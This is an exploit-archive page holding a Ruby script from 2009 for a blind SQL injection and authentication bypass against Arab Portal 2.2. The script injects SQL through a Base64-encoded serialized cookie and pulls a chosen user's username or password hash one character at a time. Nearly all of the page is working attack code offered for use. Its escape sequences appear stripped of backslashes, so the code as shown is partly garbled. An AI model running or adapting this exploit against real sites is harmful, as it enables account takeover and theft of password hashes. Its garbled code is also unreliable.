[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Arab Portal 2.2 (Auth Bypass) Blind SQL Injection Exploit
# Published : 2009-08-07
# Author : Jafer Al Zidjali
# Previous Title : Typing Pal <= 1.0 (idTableProduit) SQL Injection Vulnerability
# Next Title : PHPCityPortal (Auth Bypass) Remote SQL Injection Vulnerability


#!/usr/bin/ruby

#=============================================#
#          Arab Portal v2.2 Exploit           #,
# Blind SQL Injection / Authentication Bypass #
#  Discovered & written by: Jafer Al-Zidjali  #
#         Email: jafer@scorpionds.com         #
#         Website: www.scorpionds.com         #
#=============================================#

require "net/http"
require "base64"

intro=[
          "+=============================================+",
          "+          Arab Portal v2.2 Exploit           +",
          "+ Blind SQL Injection / Authentication Bypass +",
          "+  Discovered & written by: Jafer Al-Zidjali  +",
          "+         Email: jafer@scorpionds.com         +",
          "+         Website: www.scorpionds.com         +",
          "+=============================================+"
          ]

def print_intro text
  w="|"
  text.each do |str|
    str.scan(/./) do |c|
        STDOUT.flush
      if w=="|" 
        print "b"+c +w
        w="/"
      elsif w=="/" 
        print "b"+c +w
        w="-"  
      elsif w=="-" 
        print "b"+c +w
        w="\" 
      else
      print "b"+c +w
      w="|"
      end
      sleep 0.05
    end
    print "b "
    puts ""
  end
end

print_intro intro

puts "nEnter host name (e.g. example.com):"
host=gets.chomp

puts "nEnter script path (e.g. /arabportal/):"
path=gets.chomp

puts "nEnter userid:"
userid=gets.chomp

puts "nGetting cookie value..."

http = Net::HTTP.new(host, 80)

resp= http.get(path)
cookie = resp.response["set-cookie"]

len=cookie.split("; ").length
max=0
login_info=""

len.times do |count|
  clen=cookie.split("; ")[count].length
    if clen > max then 
      max=clen 
      login_info=cookie.split("; ")[count]
    end
end

login_info=login_info.split(", ")

if login_info[0].length > login_info[1].length
login_info=login_info[0]
else
login_info=login_info[1]
end

login_info=login_info.split("=")[0]

puts "Cookie name is: "+login_info

puts "nWhat do you want to do?"
puts "1. Get username."
puts "2. Get password hash."

opt=gets.chomp

if opt=="1"
  unamelen=0
  print "nGetting username length"

  20.times do |x|
    stmt="#{userid}"+
                    "x27x20x61x6ex64x20x6c"+
                    "x65x6ex67x74x68x28x75"+
                    "x73x65x72x6ex61x6dx65"+
                    "x29x3d#{x}x20x6fx72x20x27x27x3dx27"

    shellcode="x61x3ax35x3ax7bx69x3ax30"+
              "x3bx73x3ax31x30x3ax22x61"+
              "x72x61x62x70x6fx72x74x61"+
              "x6cx22x3bx69x3ax31x3bx69"+
              "x3ax31x3bx69x3ax32x3bx73x3a"+
              stmt.length.to_s+
              "x3ax22"+
              stmt+
              "x22x3bx69x3ax33x3bx69x3a"+
              "x30x3bx69x3ax34x3bx73x3a"+
              "x31x3ax22x61x22x3bx7d"

    header={
                  "Cookie" => login_info+"="+Base64.encode64(shellcode).gsub(/s/,"")
    }

    resp= http.get(path,header)
    if resp.body =~ /action=logout/
      puts "nLength is: #{x}"
      unamelen=x
      break
    else
        print "."
        STDOUT.flush
    end
  end 

  chars="abcdefghijklmnopqrstuvwxyz0123456789"

  print "nGetting username: "
  unamelen.times do |z|
    chars.scan(/./) do |c|
        stmt="#{userid}"+
                        "x27x20x61x6ex64x20x73"+
                        "x75x62x73x74x72x69x6e"+
                        "x67x28x75x73x65x72x6e"+
                        "x61x6dx65x2c#{z+1}x2cx31x29x3dx27#{c}x27x20x6fx72x20x27x27x3dx27"

        shellcode="x61x3ax35x3ax7bx69x3ax30"+
                  "x3bx73x3ax31x30x3ax22x61"+
                  "x72x61x62x70x6fx72x74x61"+
                  "x6cx22x3bx69x3ax31x3bx69"+
                  "x3ax31x3bx69x3ax32x3bx73x3a"+
                  stmt.length.to_s+
                  "x3ax22"+
                  stmt+
                  "x22x3bx69x3ax33x3bx69x3a"+
                  "x30x3bx69x3ax34x3bx73x3a"+
                  "x31x3ax22x61x22x3bx7d"

        header={
                      "Cookie" => login_info+"="+Base64.encode64(shellcode).gsub(/s/,"")
        }
        print c
        STDOUT.flush
        http = Net::HTTP.new(host, 80)
        resp= http.get(path,header)
        if resp.body =~ /action=logout/
          break
        end
        print "b"
    end
  end
  puts "nHave fun :)"

elsif opt=="2"
  chars="0123456789abcdef"

  print "nGetting password hash: "
  32.times do |z|
    chars.scan(/./) do |c|
        stmt="#{userid}"+
                        "x27x20x61x6ex64x20x73x75"+
                        "x62x73x74x72x69x6ex67x28"+
                        "x70x61x73x73x77x6fx72x64"+
                        "x2c#{z+1}x2cx31x29x3dx27#{c}x27"+
                        "x20x6fx72x20x27x27x3dx27" 
        shellcode="x61x3ax35x3ax7bx69x3ax30"+
                  "x3bx73x3ax31x30x3ax22x61"+
                  "x72x61x62x70x6fx72x74x61"+
                  "x6cx22x3bx69x3ax31x3bx69"+
                  "x3ax31x3bx69x3ax32x3bx73x3a"+
                  stmt.length.to_s+
                  "x3ax22"+
                  stmt+
                  "x22x3bx69x3ax33x3bx69x3a"+
                  "x30x3bx69x3ax34x3bx73x3a"+
                  "x31x3ax22x61x22x3bx7d"
        header={
                      "Cookie" => login_info+"="+Base64.encode64(shellcode).gsub(/s/,"")
        }
        print c
        STDOUT.flush
        http = Net::HTTP.new(host, 80)
        resp= http.get(path,header)
        if resp.body =~ /action=logout/	
          break
        end
        print "b"
    end
  end
  puts "nHave fun :)"
end

# www.Syue.com [2009-08-07]